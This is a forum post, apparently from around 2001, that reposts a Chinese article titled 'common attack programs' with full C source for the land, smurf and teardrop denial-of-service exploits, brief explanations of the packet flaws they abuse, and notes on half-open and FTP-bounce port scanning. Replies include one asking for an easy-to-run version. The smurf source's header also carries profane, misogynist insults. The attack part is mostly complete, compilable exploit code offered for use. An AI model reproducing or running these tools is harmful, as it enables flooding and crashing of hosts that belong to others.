作者: group [group] 论坛用户 | 登录 |
C源码:常用攻击程序 本文出自: http://linux.chinanet.cn.net:8886/ebooks/ 作者: (2001-08-22 16:38:36) Abstract 这里有一些是老的,现在看来并没有用,但他们都很有名。 1 Land 攻击一台Win95的机器。这是Win95的一个漏洞,以其IP地址和端口向自 己的同一个端口发起连接(发SYN),Win95即会崩溃。 /* land.c by m3lt, FLC crashes a win95 box */ #include <stdio.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include < netinet/ip.h > #include < netinet/tcp.h > //用于TCP校验和的伪头 struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; //计算IP校验和 u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } //new一个SOCK―RAW以发伪造IP包 这需要root权限 if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; //目的IP地址和源IP地址相同 ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; //目的TCP端口和源TCPIP端口相同 tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr), 0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); } 2 Smurf smurf攻击是很简单的,它有一些IP(广播地址)地址列表,发出了一些伪造的数 据包(ICMP echo request)从而导致一场广播风暴,可以使受害主机(使它成为伪造包 的源地址)崩溃。 受害者有两种:中间的设备(bounce sites 交换机或路由器)和被伪装的IP(那些 icmp echo的包都被发给它)。这种攻击依赖于路由器把一个广播地址转化为一广播桢 (如Ethernet, FF:FF:FF:FF:FF:FF),RFC中允许这种转换,但在今天看来是不需要的。 可以使你router停止转换第三层的广播(IP)到第二层的广播(Ethernet)。 但是Smb服务器或NT需要远程广播使LAN知道它的存在,但在路由器的上述配置会使这变 成不可能(没有WINS服务器时)。 /* * * $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $ * * spoofs icmp packets from a host to various broadcast addresses resulting * in multiple replies to that host from a single packet. * * mad head to: * nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig, * MissSatan for swallowing, napster for pimping my sister, the guy that * invented vaseline, fyber for trying, knowy, old school #havok, kain * cos he rox my sox, zuez, toxik, robocod, and everyone else that i might * have missed (you know who you are). * * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy * thing he is (he's -almost- as stubborn as me, still i managed to pick up * half the cheque). * * and a special hi to Todd, face it dude, you're fucking awesome. * * mad anal to: * #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps * because they plain suck, Rolex for being a twit, everyone that * trades warez, Caren for being a lesbian hoe, AcidKill for being her * partner, #cha0s, sedriss for having an ego in inverse proportion to * his penis and anyone that can't pee standing up -- you don't know what * your missing out on. * * and anyone thats ripped my code (diff smurf.c axcast.c is rather * interesting). * * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill * Robbins for trying to steal my girlfriend. Not only did you show me * no respect but you're a manipulating prick who tried to take away the * most important thing in the world to me with no guilt whatsoever, and * for that I wish you nothing but pain. Die. * * disclaimer: * I cannot and will not be held responsible nor legally bound for the * malicious activities of individuals who come into possession of this * program and I refuse to provide help or support of any kind and do NOT * condone use of this program to deny service to anyone or any machine. * This is for educational use only. Please Don't abuse this. * * Well, i really, really, hate this code, but yet here I am creating another * disgusting version of it. Odd, indeed. So why did I write it? Well, I, * like most programmers don't like seeing bugs in their code. I saw a few * things that should have been done better or needed fixing so I fixed * them. -shrug-, programming for me as always seemed to take the pain away * ... * * */ #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <ctype.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned short in_chksum(u_short *, int); /* stamp */ char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); if ((he = gethostbyname(argv[1])) == NULL) { perror("resolving source host"); exit(-1); } memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0); num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; } bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner (void) { puts("\nsmurf.c v4.0 by TFreak\n"); } void usage (char *prog) { fprintf(stderr, "usage: %s <target> <bcast file> " "<num packets> <packet delay> <packet size>\n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip; struct icmphdr *icmp; char *packet; packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip = (struct iphdr *)packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest; ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 0; icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc (int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } 3 Teardrop 在Linux的ip包重组过程中有一个严重的漏洞。 在ip_glue()中: 在循环中重组ip包: fp = qp->fragments; while(fp != NULL) { if(count+fp->len > skb->len) { error_to_big; } memcpy((ptr + fp->offset), fp->ptr, fp->len); count += fp->len; fp = fp->next; } 这里只检查了长度过大的情况,而没有考虑长度过小的情况, 如 fp->len<0 时,也会使内核拷贝过多的东西。 计算分片的结束位置: end = offset + ntohs(iph->tot_len) - ihl; 当发现当前包的偏移已经在上一个包的中间时(即两个包是重叠的) 是这样处理的: if (prev != NULL && offset < prev->end) { i = prev->end - offset; offset += i; /* ptr into datagram */ ptr += i; /* ptr into fragment data */ } /* Fill in the structure. */ fp->offset = offset; fp->end = end; fp->len = end - offset; //fp->len是一个有符号整数 举个例子来说明这个漏洞: 第一个碎片:mf=1 offset=0 payload=20 敌二个碎片:mf=0 offset=10 payload=9 这样第一个碎片的 end=0+20 offset=0 这样第二个碎片的 end=9+10=19 offset=offset+(20-offset)=20 fp-〉len=19-20=-1; 那么memcpy将拷贝过多的数据导致崩溃。 /* * Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97 * * Linux/NT/95 Overlap frag bug exploit * * Exploits the overlapping IP fragment bug present in all Linux kernels and * NT 4.0 / Windows 95 (others?) * * Based off of: flip.c by klepto * Compiles on: Linux, *BSD* * * gcc -O2 teardrop.c -o teardrop * OR * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/udp.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define PADDING 0x1c /* datagram frame padding for first packet */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */ #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; fprintf(stderr, "teardrop route|daemon9\n\n"); //建SOCK_RAW if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } //由系统处理IP校验和。 if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } /* * Send two IP fragments with pathological offsets. We use an implementation * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). */ void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; /* * Grab some memory for our packet, align p_ptr to point at the beginning * of our packet, and then fill it with zeros. */ packet = (u_char *)malloc(IPH + UDPH + PADDING); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to work * better. */ p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */ *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *)p_ptr) = FIX(MAGIC); if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } free(packet); } u_long name_resolve(u_char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } 4 Portscan 和 Antiportscan Portscan的两种主要方法: (1) Half-open(半打开) 利用下面特性:但一个主机收到向某个端口(TCP)发出的(SYN), 如果在这个端口有服务,那么返回(SYN+ASK),不然返回(RST)。 (2) FTP scanner 利用了FTP的port命令,例如可以这样作: 选择一个FTP服务器,连上后令port命令指向目标机,如果返回 值是正确的,那么目标机的该端口是有服务的,如返回打开端口错误则 该端口无服务。 telnet 21 Trying Connected to pp.bricks.org. Escape character is '^]'. 220 pp.bricks.org FTP server (Version wu-2.4.2-academ[BETA-16](1) Thu May 7 23:18:05 EDT 1998) ready. user anonymous 331 Guest login ok, send your complete e-mail address as password. pass aa@aa.aa 230 Guest login ok, access restrictions apply. port a,b,c,d,p1,p2 // a.b.c.d是要探测的目标 p1 p2是目的端口 150 Opening ASCII mode data connection for file list. 425 Can't build data connection: Connection refused. //该端口未活动 150 Opening ASCII mode data connection for file list. 226 Transfer complete. //该端口活动中 但有些FTP服务器禁止你将数据连接影响其他地址,那就没办法了。 上述两种方法是通用的,而针对个别系统有一些特殊方法。 如一些系统受到包后会作如下处理: 标志 活动的端口的应答 不活动端口的应答 SYN SYN|ACK RST 或 Nothing SYN|FIN ACK or SYN|ACK* RST ACK Nothing RST 0 flag Nothing RST 你最好是试一试。 Antiport 一般是调用 sd=socket(PF_INET,SOCK_RAW,6),然后不停的读, 若发现一个主机不停的象你发送(SYN)包,却没有完成连结,可以认 定它在向你做portscan。 notes: 早期的portscan程序是老老实实的向你一个一个端口连(完成三次握手), 而一些antiscan是在一个平时不用的端口上起一个服务器,并认为连上来的 都是向它scan。 |
地主 发表时间: 03/31 02:08 |
回复: 54183710 [hcz] 论坛用户 | 登录 |
唉》》》》可惜我看不懂,不如你教我 |
B1层 发表时间: 03/31 17:46 |
回复: vishx [vishx] 论坛用户 | 登录 |
C语言我会做N道数学题~~ |
B2层 发表时间: 05/14 16:57 |
回复: fireblue [fireblue] 论坛用户 | 登录 |
谢谢,俺正在学这个,我拿走了. 下回有空再找一些好东西啊 |
B3层 发表时间: 05/14 17:22 |
回复: nanhairen [nanhairen] 前任版主 | 登录 |
晓澜:你什么时候把这个做成一个程序送给我?要操作简单一点的。嘻嘻~~ |
B4层 发表时间: 05/14 23:51 |
回复: group [group] 论坛用户 | 登录 |
这些程序都是过时的老程序,现在只有参考价值 |
B5层 发表时间: 05/15 01:09 |
回复: davy [davy] 论坛用户 | 登录 |
可以用来学习编程 |
B6层 发表时间: 05/16 19:17 |
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